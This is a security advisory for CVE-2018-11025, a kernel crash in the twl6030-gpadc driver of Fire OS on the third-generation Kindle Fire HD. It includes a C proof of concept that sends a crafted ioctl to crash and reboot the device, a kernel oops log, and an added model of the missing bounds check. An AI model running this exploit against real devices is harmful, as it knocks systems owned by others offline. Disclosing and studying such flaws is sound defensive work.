(CVE-2018-11025) Amazon Kindle Fire HD (3rd) Fire OS kernel component security vulnerability

1. Vulnerability description

The kernel module omap/drivers/mfd/twl6030-gpadc.c in the Fire OS 4.5.5.3 kernel of the Amazon Kindle Fire HD (3rd generation) allows an attacker to inject a crafted argument through the ioctl interface of the device /dev/twl6030-gpadc using command 24832, which causes a kernel crash. To trigger the vulnerability, the device file /dev/twl6030-gpadc must be opened and the ioctl system call invoked on it with command 24832 and a carefully crafted payload as the third argument.
2. Affected versions

Fire OS 4.5.5.3

3. Reproduction

PoC:

```c
/* This is poc of Kindle Fire HD 3rd
 * A bug in the ioctl interface of device file /dev/twl6030-gpadc causes
 * the system crash via IOCTL 24832.
 * This PoC should run with permission to do ioctl on /dev/twl6030-gpadc.
 */
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>

const static char *driver = "/dev/twl6030-gpadc";
static int command = 24832;

/* Argument structure expected by the driver's ioctl handler */
struct twl6030_gpadc_user_parms {
    int channel;
    int status;
    unsigned short result;
};

/* Appends a line to the PoC's log file; the exact logging call is garbled
 * in the source and is reconstructed here as a plain file write. */
static void log_line(const char *msg)
{
    FILE *log = fopen("/data/local/tmp/log", "a");
    if (log) {
        fprintf(log, "%s\n", msg);
        fclose(log);
    }
}

int main(int argc, char *argv[], char *env[])
{
    struct twl6030_gpadc_user_parms payload;
    payload.channel = 0x9b2a9212;   /* crafted channel value */
    payload.status = 0x0;
    payload.result = 0x0;
    int fd = 0;

    fd = open(driver, O_RDWR);
    if (fd < 0) {
        log_line("open device file failed");
        return -1;
    }
    printf("Try ioctl device file %s, with command 0x%x and payload NULL\n", driver, command);
    printf("System will crash and reboot.\n");
    if (ioctl(fd, command, &payload) < 0) {
        log_line("ioctl failed");
        return -1;
    }
    close(fd);
    return 0;
}
```

Crash log:

```text
[18460.321624] Unable to handle kernel paging request at virtual address 4b3f25fc
[18460.330139] pgd = ca210000
[18460.333251] [4b3f25fc] *pgd=00000000
[18460.337768] Internal error: Oops: 5 [#1] PREEMPT SMP ARM
[18460.343810] Modules linked in: omaplfb(O) pvrsrvkm(O) pvr_logger(O)
[18460.351440] CPU: 0    Tainted: G           O  (3.4.83-gd2afc0bae69 #1)
[18460.358825] PC is at twl6030_gpadc_ioctl+0x160/0x180
[18460.364379] LR is at twl6030_gpadc_conversion+0x5c/0x484
[18460.370452] pc : [<c031b080>]    lr : [<c031a950>]    psr: 60030013
[18460.370452] sp : de94dd90  ip : 00000000  fp : de94df04
[18460.383422] r10: 00000000  r9 : dcccf608  r8 : bea875ec
[18460.389282] r7 : de94c000  r6 : 00000000  r5 : 00006100  r4 : bea875ec
[18460.396697] r3 : fffffeb4  r2 : 4b3f2730  r1 : de94dee8  r0 : 00000000
[18460.404113] Flags: ZCv  IRQs on  FIQs on  Mode SVC_32  ISA ARM  Segment user
[18460.412048] Control: 10c5387d  Table: 8a21004a  DAC: 00000015
[18460.418609] PC: 0xc031b000:
[18460.508544] LR: 0xc031a8d0:
[18460.598571] SP: 0xde94dd10:
[18460.688659] FP:
```

(The raw memory dumps printed after the PC, LR, SP and FP markers are not reproduced.)
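The PoC above reaches the fault with a single crafted channel value in the ioctl argument. As an added example that is not code from the advisory or from the Fire OS driver, the following userspace model shows the argument validation a handler for this ioctl needs: it rejects unknown command numbers and bounds-checks channel before it is used to select anything, and it replays the PoC payload against that check. The channel count, the macro name GPADC_CMD_RAW_READ and the assumption that the unchecked channel is what the driver dereferences are assumptions, not facts stated on the page.

```c
/* Added userspace model of an ioctl argument check for the twl6030 GPADC
 * interface. Not the Fire OS driver code: the channel count, the command
 * macro name and the use of channel as a table index are assumptions. */
#include <errno.h>
#include <stdint.h>
#include <string.h>

#define GPADC_CMD_RAW_READ 24832   /* ioctl command number from the PoC */
#define GPADC_NUM_CHANNELS 17      /* assumed size of the channel table */

struct twl6030_gpadc_user_parms {  /* argument layout used by the PoC */
    int channel;
    int status;
    unsigned short result;
};

/* Kernel-side handler model: returns 0 or a negative errno, as a Linux
 * ioctl handler would, instead of touching memory for a bad channel. */
int gpadc_ioctl_model(unsigned int cmd, struct twl6030_gpadc_user_parms *par)
{
    uint16_t results[GPADC_NUM_CHANNELS];  /* stands in for per-channel data */
    memset(results, 0, sizeof results);

    if (cmd != GPADC_CMD_RAW_READ)
        return -ENOTTY;                    /* unknown command for this device */

    /* Validate the user-controlled index before it selects anything:
     * a huge or negative channel is rejected, never used as an offset. */
    if (par->channel < 0 || par->channel >= GPADC_NUM_CHANNELS)
        return -EINVAL;

    par->result = results[par->channel];
    par->status = 0;
    return 0;
}

/* Drive the model with a given command and channel; returns the handler's
 * status so callers can check the decision it made. */
int gpadc_try(unsigned int cmd, int channel)
{
    struct twl6030_gpadc_user_parms par = { channel, 0, 0 };
    return gpadc_ioctl_model(cmd, &par);
}

/* Replay the PoC payload: channel 0x9b2a9212 is negative as an int and
 * must be refused with -EINVAL rather than handled. */
int replay_poc_payload(void)
{
    return gpadc_try(GPADC_CMD_RAW_READ, (int)0x9b2a9212);
}
```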